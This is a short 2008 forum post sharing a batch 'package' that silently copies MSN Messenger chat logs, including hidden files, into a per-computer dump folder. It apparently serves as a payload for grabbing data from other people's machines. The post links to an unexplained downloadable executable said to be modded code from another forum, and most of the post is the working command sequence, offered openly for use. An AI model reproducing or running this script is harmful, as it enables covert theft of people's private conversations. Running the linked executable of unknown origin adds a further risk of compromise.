Gandalf the l33er Posted January 28, 2008 Share Posted January 28, 2008 I decided to come up with something new. This package first puts the dir to the messenger chat history folder in a text file (coudn't see any elegant way to do it), and then reads the textfile and put the dir in a var. Then it copies the chatlog. Needed file: http://www.myupload.dk/showfile/9418f7520.exe/ Commands: .MsnHistory.exe>msnlogdir.txt Set /P MSNLOG=<msnlogdir.txt del msnlogdir.txt md WIPdump%computername%Chatlog xcopy /E /C /H /Y /I "%MSNLOG%" "WIPdump%computername%Chatlog" What do you think? (the little cmdline app is a modded version of some code from some forum) Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.